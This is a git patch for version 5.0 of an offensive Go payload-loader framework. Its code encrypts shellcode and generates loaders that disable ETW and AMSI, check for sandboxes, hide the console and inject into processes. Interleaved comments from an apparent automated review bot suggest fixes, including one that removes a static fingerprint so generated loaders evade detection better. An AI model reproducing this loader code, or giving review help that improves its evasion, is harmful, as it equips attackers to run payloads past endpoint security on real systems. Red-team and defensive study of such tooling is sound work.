From 210410adf3dd0cad8ceebfee56ee2d35ec6d48c4 Mon Sep 17 00:00:00 2001
From: Tylous
Date: Thu, 20 Apr 2023 13:51:50 -0400
Subject: [PATCH] v5.0

---
 Cryptor/Cryptor.go         |   85 ++
 Loader/Loader.go           | 1163 ++++++++++++++-------------
 README.md                  |  145 +++-
 ScareCrow.go               |  103 ++-
 Struct/Struct.go           | 1514 +++++++++++++-----------------------
 Utils/Utils.go             |   88 ++-
 go.mod                     |    8 +-
 go.sum                     |   13 +-
 limelighter/limelighter.go |   88 +--
 9 files changed, 1537 insertions(+), 1670 deletions(-)

diff --git a/Cryptor/Cryptor.go b/Cryptor/Cryptor.go
index 7a6057c..b9c2e3f 100644
--- a/Cryptor/Cryptor.go
+++ b/Cryptor/Cryptor.go
@@ -2,17 +2,25 @@ package Cryptor
 
 import (
 	"bytes"
+	"crypto/aes"
+	"crypto/cipher"
 	"crypto/rand"
+	"crypto/rc4"
 	"encoding/hex"
 	"errors"
 	"fmt"
+	"io"
+	"io/ioutil"
 	"log"
 	crand "math/rand"
 	"time"
+
+	"github.com/ulikunitz/xz"
 )
 
 const capletters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
 const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
+const hexchar = "abcef12345678890"
 
 var (
 	ErrInvalidBlockSize = errors.New("[-] Invalid Blocksize")
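Review bot: The new `hexchar` constant at the end of this hunk is not the hexadecimal alphabet it appears to be — it omits `d` and lists `8` twice, so any string drawn from it never contains `d` and is skewed toward `8`. If Mangle's output lands in generated loaders as hash- or hex-looking identifiers, that skew is a static fingerprint shared by every artefact this version emits, which is the opposite of what the mangling is for; the fix is `const hexchar = "0123456789abcdef"`. The import additions are fine as they stand, though `io/ioutil` has been deprecated since Go 1.16 in favour of `os.ReadFile`; whether that matters depends on the go.mod change in this commit, which is not in view here.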
@@ -22,6 +30,74 @@ var (
 	ErrInvalidPKCS7Padding = errors.New("[-] Invalid Padding on Input")
 )
 
+func EncryptShellcode(inputFile string, encryptionmode string) (string, string, string) {
+	var rawbyte []byte
+	var b64ciphertext, b64key, b64iv string
+	src, _ := ioutil.ReadFile(inputFile)
+	if encryptionmode == "AES" {
+		rawbyte = src
+		key := RandomBuffer(32)
+		iv := RandomBuffer(16)
+
+		block, err := aes.NewCipher(key)
+		if err != nil {
+			log.Fatal(err)
+		}
+		paddedInput, err := Pkcs7Pad([]byte(rawbyte), aes.BlockSize)
+		if err != nil {
+			log.Fatal(err)
+		}
+		cipherText := make([]byte, len(paddedInput))
+		ciphermode := cipher.NewCBCEncrypter(block, iv)
+		ciphermode.CryptBlocks(cipherText, paddedInput)
+		b64ciphertext = fmt.Sprintf("%x", cipherText)
+		b64key = fmt.Sprintf("%x", key)
+		b64iv = fmt.Sprintf("%x", iv)
+		return b64ciphertext, b64key, b64iv
+	}
+	if encryptionmode == "ELZMA" {
+		var buf bytes.Buffer
+		fmt.Println("[*] Encrypting Shellcode Using ELZMA Encryption")
+		w, err := xz.NewWriter(&buf)
+		if err != nil {
+			log.Fatalf("xz.NewWriter error %s", err)
+		}
+		if _, err := io.WriteString(w, string(src)); err != nil {
+			log.Fatalf("WriteString error %s", err)
+		}
+		if err := w.Close(); err != nil {
+			log.Fatalf("w.Close error %s", err)
+		}
+		fart := fmt.Sprintf("%x", buf.Bytes())
+		b64ciphertext = fart
+		return b64ciphertext, b64key, b64key
+	}
+	if encryptionmode == "RC4" {
+		plaintext := []byte(src)
+		fmt.Println("[*] Encrypting Shellcode Using RC4 Encryption")
+		key, _ := generateRandomBytes(32)
+		block, _ := rc4.NewCipher(key)
+		ciphertext := make([]byte, len(plaintext))
+		block.XORKeyStream(ciphertext, plaintext)
+
+		b64ciphertext = fmt.Sprintf("%x", ciphertext)
+		b64key = fmt.Sprintf("%x", key)
+
+	}
+	return b64ciphertext, b64key, b64iv
+
+}
+
+func generateRandomBytes(n int) ([]byte, error) {
+	b := make([]byte, n)
+	_, err := rand.Read(b)
+	if err != nil {
+		return nil, err
+	}
+
+	return b, nil
+}
+
 func Pkcs7Pad(b []byte, blocksize int) ([]byte,
error) { if blocksize <= 0 { return nil, ErrInvalidBlockSize @@ -54,6 +130,15 @@ func RandStringBytes(n int) string { return string(b) } +func Mangle(n int) string { + b := make([]byte, n) + for i := range b { + b[i] = hexchar[crand.Intn(len(hexchar))] + + } + return string(b) +} + func VarNumberLength(min, max int) string { var r string crand.Seed(time.Now().UnixNano()) diff --git a/Loader/Loader.go b/Loader/Loader.go index 5a44352..c6f094d 100644 --- a/Loader/Loader.go +++ b/Loader/Loader.go @@ -41,16 +41,18 @@ type AMSI struct { Variables map[string]string } -type WriteProcessMemory struct { +type Console struct { Variables map[string]string } -type DLL struct { +type WriteProcessMemory struct { Variables map[string]string } -type WindowsVersion struct { + +type Header struct { Variables map[string]string } + type Sandboxfunction struct { Variables map[string]string } @@ -67,6 +69,14 @@ type Shellcode struct { Variables map[string]string } +type Shellcode_Loader struct { + Variables map[string]string +} + +type Reload struct { + Variables map[string]string +} + var ( buffer bytes.Buffer ) @@ -109,7 +119,7 @@ func FileName(mode string) (string, string) { return name, filename } -func ETW_Buff(b64number int, decode string, WriteProcessMemory string) (string, string) { +func ETW_Buff(b64number int, decode string, WriteProcessMemory string) (string, string, string) { var buffer bytes.Buffer ETW := &ETW{} ETW.Variables = make(map[string]string) @@ -127,6 +137,7 @@ func ETW_Buff(b64number int, decode string, WriteProcessMemory string) (string, ETW.Variables["nLength"] = Cryptor.VarNumberLength(4, 9) ETW.Variables["datalength"] = Cryptor.VarNumberLength(4, 9) + ETW.Variables["RemoteETW"] = Cryptor.VarNumberLength(4, 9) ETW.Variables["decode"] = decode ETW.Variables["WriteProcessMemoryName"] = Utils.StringEncode("WriteProcessMemory", b64number) ETW.Variables["EtwNotificationRegisterName"] = Utils.StringEncode("EtwNotificationRegister", b64number) 
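Review bot: `src, _ := ioutil.ReadFile(inputFile)` near the top of EncryptShellcode discards the read error, so a mistyped path yields an empty buffer that is padded, encrypted and embedded without complaint, and the failure only shows up when the generated loader executes nothing. The RC4 branch drops two more errors, `key, _ := generateRandomBytes(32)` and `block, _ := rc4.NewCipher(key)`, so a failed crypto/rand read would silently encrypt with an all-zero key. Handle all three the way the AES branch already handles aes.NewCipher, as in the excerpt below. Two smaller things: the ELZMA branch returns `b64ciphertext, b64key, b64key` where the other branches return `(ciphertext, key, iv)`, and an encryptionmode matching none of the three strings falls through to return three empty strings instead of failing loudly. Pkcs7Pad, whose opening lines close the hunk, continues outside it.
```go
	src, err := ioutil.ReadFile(inputFile)
	if err != nil {
		log.Fatalf("[-] Unable to read %s: %s", inputFile, err)
	}
	// … unchanged: AES and ELZMA branches …
	if encryptionmode == "RC4" {
		// … unchanged: plaintext copy and banner …
		key, err := generateRandomBytes(32)
		if err != nil {
			log.Fatalf("[-] Unable to generate RC4 key: %s", err)
		}
		block, err := rc4.NewCipher(key)
		if err != nil {
			log.Fatal(err)
		}
		// … unchanged: XORKeyStream and hex encoding …
	}
```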
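Review bot: Mangle is exported with no doc comment, and nothing records that it draws from math/rand's global source via `crand.Intn` and is therefore for cosmetic identifier mangling only — the keys elsewhere in this file come from crypto/rand, and a later caller should not confuse the two. Add above it `// Mangle returns an n-character string drawn from hexchar using math/rand; it is meant for obfuscating generated identifiers and must not be used for keys or IVs.` It also does not seed the generator itself; VarNumberLength, whose first lines close the hunk, calls `crand.Seed(time.Now().UnixNano())`, so Mangle's output only varies between runs if something else has seeded first (or the toolchain is Go 1.20+, where the global source seeds itself) — worth stating in the comment if that ordering is intentional. VarNumberLength continues outside the hunk.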
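Review bot: `Shellcode_Loader`, the first type added in this hunk, puts an underscore in an exported Go identifier; the neighbouring template-variable types are MixedCaps (`Sandboxfunction`, `WriteProcessMemory`, `Reload`), and `go vet`/`staticcheck` will keep flagging the odd one out. Both new types, like every other type visible in this file, are the identical `struct { Variables map[string]string }`, so one shared type would replace the growing list, though that rename is reasonable as a follow-up. At minimum each new type should get a one-line doc comment naming the template it feeds, since nothing here says what distinguishes `Shellcode_Loader` from `Shellcode` or what `Reload` is rendered into.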
@@ -143,7 +154,7 @@ func ETW_Buff(b64number int, decode string, WriteProcessMemory string) (string, if err := ETWTemplate.Execute(&buffer, ETW); err != nil { log.Fatal(err) } - return buffer.String(), ETW.Variables["ETW"] + return buffer.String(), ETW.Variables["ETW"], ETW.Variables["RemoteETW"] } func AMSI_Buff(WriteProcessMemory string) (string, string) { 
@@ -200,479 +211,418 @@ func WriteProcessMemory_Buff(number string, b64number int) (string, string, stri return buffer.String(), WriteProcessMemory.Variables["decode"], WriteProcessMemory.Variables["WriteProcessMemory"] } -func DLLfile(b64ciphertext string, b64key string, b64iv string, mode string, refresher bool, name string, sandbox bool, ETW bool, ProcessInjection string, AMSI bool) (string, string, string) { - var LoaderTemplate, DLLStructTemplate string - DLL := &DLL{} - DLL.Variables = make(map[string]string) - Sandboxfunction := &Sandboxfunction{} - Sandboxfunction.Variables = make(map[string]string) - Sandbox_DomainJoined := &Sandbox_DomainJoined{} - Sandbox_DomainJoined.Variables = make(map[string]string) - WindowsVersion := &WindowsVersion{} - WindowsVersion.Variables = make(map[string]string) - DLL.Variables["FuncName"] = Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) - DLL.Variables["NTFuncName"] = Cryptor.CapLetter() + Cryptor.VarNumberLength(10, 19) - DLL.Variables["buff"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["alloc"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["phandle"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["baseA"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["zerob"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["alloctype"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["protect"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["regionsizep"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["regionsize"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["Versionfunc"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["k"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["Version"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["MV"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["MinV"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["customsyscall"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["syscallnumber"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["dll"] = 
Cryptor.VarNumberLength(10, 19) - DLL.Variables["error"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["x"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["file"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["loaddll"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["handle"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["dllBase"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["dllOffset"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["old"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["oldptrperms"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["ptr"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["shellcode"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["loader"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["DLLname"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["hexdata"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["Reloading"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["bytes"] = Cryptor.VarNumberLength(10, 19) - - DLL.Variables["customsyscallVP"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["runfunc"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["bytes"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["loc"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["dllOffset"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["mem"] = Cryptor.VarNumberLength(10, 19) - - DLL.Variables["getWin"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["showWin"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["hwnd"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["oldfartcodeperms"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["baseAddress"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["processHandle"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["handlez"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["sysid"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["bytesdata"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["locdata"] = Cryptor.VarNumberLength(10, 19) - 
DLL.Variables["xdata"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["dllBasedata"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["dllOffsetdata"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["memdata"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["CreateProcess"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["GetModuleInformation"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["ReloadRemoteProcess"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["RemoteModuleReloading"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["Target"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["WriteProcessMemory"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["addr"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["buf"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["commandLine"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["data"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["err"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["funcNtAllocateVirtualMemory"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["funcNtCreateThreadEx"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["funcNtProtectVirtualMemory"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["funcNtWriteVirtualMemory"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["hModule"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["hProcess"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["handleSize"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["hh"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["lpBaseAddress"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["lpBuffer"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["lpNumberOfBytesWritten"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["mi"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["mod"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["modules"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["module"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["nLength"] = 
Cryptor.VarNumberLength(10, 19) - DLL.Variables["nSize"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["name"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["needed"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["n"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["offsetaddr"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["oldProtect"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["outString"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["pi"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["procEnumProcessModules"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["EnumProcessModules"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["procGetModuleBaseName"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["GetModuleBaseName"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["procGetModuleInformation"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["procWriteProcessMemory"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["process"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["rawbytes"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["raw_bin"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["s"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["si"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["size"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["startupInfo"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["PROCESS_ALL_ACCESS"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["errnoERROR_IO_PENDING"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["errERROR_IO_PENDING"] = Cryptor.VarNumberLength(10, 19) - - b64number := Cryptor.GenerateNumer(3, 6) - DLL.Variables["b64number"] = strconv.Itoa(b64number) - DLL.Variables["errnoErr"] = Cryptor.VarNumberLength(4, 9) - DLL.Variables["WriteProcessMemoryName"] = Utils.StringEncode("WriteProcessMemory", b64number) - - DLL.Variables["decode"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["b64"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["decoded"] 
= Cryptor.VarNumberLength(10, 19) - DLL.Variables["number"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["sum"] = Cryptor.VarNumberLength(10, 19) - - DLL.Variables["MI"] = Cryptor.VarNumberLength(4, 9) +func Imports_Buff(binary bool, console bool, sandbox bool, injection string, evasion string, ETW bool, AMSI bool) string { + var buffer bytes.Buffer + Imports := &Header{} + Imports.Variables = make(map[string]string) - if sandbox == true { - DLL.Variables["SandboxOS"] = `"os"` - DLL.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["domain"] = Cryptor.VarNumberLength(10, 19) - DLL.Variables["status"] = Cryptor.VarNumberLength(10, 19) - SandboxFunctionTemplate, err := template.New("Sandboxfunction").Parse(Struct.Sandbox()) - if err != nil { - log.Fatal(err) + if binary == false { + Imports.Variables["CPORT"] = `import "C"` + } else { + Imports.Variables["CPORT"] = "" + } + if binary == true || (binary == false && AMSI == false) { + Imports.Variables["Windows_Import"] = `"golang.org/x/sys/windows"` + } else { + Imports.Variables["Windows_Import"] = `"golang.org/x/sys/windows"` + } + if evasion == "KnownDLL" { + Imports.Variables["debugpeimport"] = `filepe "debug/pe"` + Imports.Variables["AdditionalImports"] = `"github.com/Binject/debug/pe" + "github.com/awgh/rawreader"` + Imports.Variables["fmt"] = `"fmt"` + if injection != "" { + Imports.Variables["fmt"] = `"fmt" + "io/ioutil"` } - if err := SandboxFunctionTemplate.Execute(&buffer, DLL); err != nil { - log.Fatal(err) + } + if evasion == "Disk" { + Imports.Variables["debugpeimport"] = `"debug/pe"` + Imports.Variables["AdditionalImports"] = "" + if binary == false { + Imports.Variables["fmt"] = `"fmt" + "io/ioutil"` + } else { + Imports.Variables["fmt"] = `"fmt" + "io/ioutil"` } - DLL.Variables["Sandboxfunction"] = buffer.String() - DLL.Variables["checker"] = Cryptor.VarNumberLength(10, 19) - Sandbox_DomainJoinedTemplate, err := 
template.New("Sandbox_DomainJoined").Parse(Struct.Sandbox_DomainJoined()) - buffer.Reset() - if err != nil { - log.Fatal(err) + } + if evasion == "None" { + Imports.Variables["debugpeimport"] = "" + Imports.Variables["AdditionalImports"] = "" + if binary == false { + //temp fix for DLLs with None + Imports.Variables["fmt"] = `"fmt"` + } else { + Imports.Variables["fmt"] = `"fmt"` } - if err := Sandbox_DomainJoinedTemplate.Execute(&buffer, DLL); err != nil { - log.Fatal(err) + if injection != "" { + Imports.Variables["fmt"] = `"fmt" + "debug/pe" + "io/ioutil"` } - DLL.Variables["Sandbox"] = buffer.String() - buffer.Reset() - } else { - DLL.Variables["SandboxOS"] = "" - DLL.Variables["Sandbox"] = "" - DLL.Variables["Sandboxfunction"] = "" - DLL.Variables["SandboxImport"] = "" } - - WindowsVersion.Variables["Version"] = DLL.Variables["Version"] - WindowsVersion.Variables["syscall"] = DLL.Variables["syscall"] - WindowsVersion.Variables["customsyscall"] = DLL.Variables["customsyscall"] - WindowsVersion.Variables["customsyscallVP"] = DLL.Variables["customsyscallVP"] - buffer.Reset() - - if (ETW == false || AMSI == false) || ProcessInjection != "" { - WriteProcessMemory_Function, decode, WriteProcessMemory := WriteProcessMemory_Buff(DLL.Variables["b64number"], b64number) - DLL.Variables["decode"] = decode - DLL.Variables["WriteProcessMemory_Function"] = WriteProcessMemory_Function - DLL.Variables["WriteProcessMemory"] = WriteProcessMemory - } else { - DLL.Variables["WriteProcessMemory_Function"] = "" - } - - if ETW == false { - ETW_Function, ETW := ETW_Buff(b64number, DLL.Variables["decode"], DLL.Variables["WriteProcessMemory"]) - DLL.Variables["ETW"] = ETW + "()" - DLL.Variables["ETW_Function"] = ETW_Function - DLL.Variables["B64"] = `"encoding/base64"` + if binary == true && console == true { + Imports.Variables["DebugImport"] = `"io" + "os"` } else { - DLL.Variables["ETW"] = "" - DLL.Variables["ETW_Function"] = "" - DLL.Variables["B64"] = `` + 
Imports.Variables["DebugImport"] = "" } - if AMSI == false { - AMSI_Function, AMSI := AMSI_Buff(DLL.Variables["WriteProcessMemory"]) - DLL.Variables["AMSI_Function"] = AMSI_Function - DLL.Variables["AMSI"] = AMSI + "()" - DLL.Variables["Windows_Import"] = `"golang.org/x/sys/windows"` - + if sandbox == true { + if console == true { + Imports.Variables["SandboxOS"] = "" + } else { + Imports.Variables["SandboxOS"] = `"os"` + } } else { - DLL.Variables["AMSI_Function"] = "" - DLL.Variables["AMSI"] = "" - DLL.Variables["Windows_Import"] = `` + Imports.Variables["SandboxOS"] = "" } - - if ETW == false || AMSI == false { - DLL.Variables["HEX_Import"] = `"encoding/hex"` + if ETW == false || AMSI == false || injection != "" { + Imports.Variables["HEX_Import"] = `"encoding/hex"` } else { - DLL.Variables["HEX_Import"] = `` + Imports.Variables["HEX_Import"] = "" } - - if refresher == false { - LoaderTemplate = Struct.WindowsVersion_Syscall() - DLLStructTemplate = Struct.DLL_Refresher() + if binary == false && injection == "" { + Imports.Variables["Time_Import"] = "" } else { - LoaderTemplate = Struct.WindowsVersion_Syscall_Unmod() - DLLStructTemplate = Struct.DLL() - } - if ProcessInjection != "" && refresher == false { - ProcessInjection = strings.Replace(ProcessInjection, "\\", "\\\\", -1) - DLL.Variables["processpath"] = ProcessInjection - DLL.Variables["offset"] = Cryptor.VarNumberLength(4, 9) - DLL.Variables["datalength"] = Cryptor.VarNumberLength(4, 9) - LoaderTemplate = Struct.WindowsVersion_Syscall() - DLLStructTemplate = Struct.Procces_Injection_DLL() - + Imports.Variables["Time_Import"] = `"time"` } - WindowsVersionTemplate, err := template.New("WindowsVersion").Parse(LoaderTemplate) + ImportTemplate, err := template.New("Imports").Parse(Struct.Imports()) if err != nil { log.Fatal(err) - } - buffer.Reset() - if err := WindowsVersionTemplate.Execute(&buffer, WindowsVersion); err != nil { + if err := ImportTemplate.Execute(&buffer, Imports); err != nil { log.Fatal(err) 
} - DLL.Variables["SyscallNumberlist"] = buffer.String() - - if mode == "excel" { - DLL.Variables["ExportName"] = Struct.JS_Office_Export() + return buffer.String() +} +func Header_Buff(binary bool, AMSI bool, ETW bool, ProcessInjection string, console bool, sandbox bool, evasion string) (string, string, string, string, string, string, string, string, string, string, string, string, string) { + var buffer bytes.Buffer + Header := &Header{} + Header.Variables = make(map[string]string) + Sandboxfunction := &Sandboxfunction{} + Sandboxfunction.Variables = make(map[string]string) + Sandbox_DomainJoined := &Sandbox_DomainJoined{} + Sandbox_DomainJoined.Variables = make(map[string]string) + Console := &Console{} + Console.Variables = make(map[string]string) + + Header.Variables["Imports"] = Imports_Buff(binary, console, sandbox, ProcessInjection, evasion, ETW, AMSI) + + Header.Variables["PROCESS_ALL_ACCESS"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["customsyscall"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["customsyscallVP"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["number"] = Cryptor.VarNumberLength(4, 9) + + Header.Variables["Sandboxfunction"] = Cryptor.VarNumberLength(4, 9) + + Header.Variables["Versionfunc"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["k"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["Version"] = Cryptor.VarNumberLength(4, 9) //need to export this + Header.Variables["MV"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["MinV"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["customsyscall"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["customsyscallVP"] = Cryptor.VarNumberLength(4, 9) + + Header.Variables["decoded"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["b64"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["sum"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["WriteProcessMemory_Function"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["ETW_Function"] = 
Cryptor.VarNumberLength(4, 9) + Header.Variables["AMSI_Function"] = Cryptor.VarNumberLength(4, 9) + Header.Variables["FindAddress"] = Cryptor.VarNumberLength(4, 9) + b64number := Cryptor.GenerateNumer(3, 6) + Header.Variables["b64number"] = strconv.Itoa(b64number) + + if console == true { + Header.Variables["Debug"] = ` + var ( + debugWriter io.Writer + ) + + func printDebug(format string, v ...interface{}) { + debugWriter = os.Stdout + output := fmt.Sprintf("[DEBUG] ") + output += format +"\n" + fmt.Fprintf(debugWriter, output, v...) + } + ` + } else { + Header.Variables["Debug"] = "" } - if mode == "control" { - DLL.Variables["ExportName"] = Struct.JS_Control_Export() - + WriteProcessMemory_Function, decode, WriteProcessMemory := WriteProcessMemory_Buff(Header.Variables["b64number"], b64number) + if (ETW == false || AMSI == false) || ProcessInjection != "" { + Header.Variables["decode"] = decode + Header.Variables["WriteProcessMemory_Function"] = WriteProcessMemory_Function + Header.Variables["WriteProcessMemory"] = WriteProcessMemory + } else { + Header.Variables["WriteProcessMemory_Function"] = "" + Header.Variables["decode"] = decode } - if mode == "wscript" || mode == "dll" { - DLL.Variables["ExportName"] = Struct.WS_JS_Export() + if ETW == false { + ETW_Function, ETW, RemoteETW := ETW_Buff(b64number, Header.Variables["decode"], Header.Variables["WriteProcessMemory"]) + Header.Variables["ETW"] = ETW + "()" + Header.Variables["RemoteETW"] = RemoteETW + Header.Variables["ETW_Function"] = ETW_Function + Header.Variables["B64"] = `"encoding/base64"` + } else { + Header.Variables["ETW"] = "" + Header.Variables["RemoteETW"] = "" + Header.Variables["ETW_Function"] = "" + Header.Variables["B64"] = `` } + if AMSI == false { + AMSI_Function, AMSI := AMSI_Buff(Header.Variables["WriteProcessMemory"]) + Header.Variables["AMSI_Function"] = AMSI_Function + Header.Variables["AMSI"] = AMSI + "()" - if mode == "msiexec" { - DLL.Variables["ExportName"] = Struct.WS_JS_Export() + 
} else { + Header.Variables["AMSI_Function"] = "" + Header.Variables["AMSI"] = "" } + if AMSI == false { + AMSI_Function, AMSI := AMSI_Buff(Header.Variables["WriteProcessMemory"]) + Header.Variables["AMSI_Function"] = AMSI_Function + Header.Variables["AMSI"] = AMSI + "()" - buffer.Reset() + } else { + Header.Variables["AMSI_Function"] = "" + Header.Variables["AMSI"] = "" + } + + if binary == true { + Console.Variables["decode"] = Header.Variables["decode"] + Console.Variables["Console"] = Cryptor.VarNumberLength(10, 19) + Console.Variables["getWin"] = Cryptor.VarNumberLength(10, 19) + Console.Variables["showWin"] = Cryptor.VarNumberLength(10, 19) + Console.Variables["hwnd"] = Cryptor.VarNumberLength(10, 19) + Console.Variables["show"] = Cryptor.VarNumberLength(10, 19) + Console.Variables["SW_RESTORE"] = Cryptor.VarNumberLength(10, 19) + Console.Variables["SW_HIDE"] = Cryptor.VarNumberLength(10, 19) + Console.Variables["GetConsoleWindowName"] = Utils.StringEncode("GetConsoleWindow", b64number) + Console.Variables["ShowWindowName"] = Utils.StringEncode("ShowWindow", b64number) + + ConsoleTemplate, err := template.New("Console").Parse(Struct.Console()) + if err != nil { + log.Fatal(err) + } + if err := ConsoleTemplate.Execute(&buffer, Console); err != nil { + log.Fatal(err) + } + Header.Variables["Console_Function"] = buffer.String() + buffer.Reset() + } else { + Header.Variables["Console_Function"] = "" + } + + if sandbox == true { + Header.Variables["IsDomainJoined"] = Cryptor.VarNumberLength(10, 19) + Header.Variables["domain"] = Cryptor.VarNumberLength(10, 19) + Header.Variables["status"] = Cryptor.VarNumberLength(10, 19) + SandboxFunctionTemplate, err := template.New("Sandboxfunction").Parse(Struct.Sandbox()) + if err != nil { + log.Fatal(err) + } + if err := SandboxFunctionTemplate.Execute(&buffer, Header); err != nil { + log.Fatal(err) + } + Header.Variables["Sandboxfunction"] = buffer.String() + Header.Variables["checker"] = Cryptor.VarNumberLength(10, 19) + 
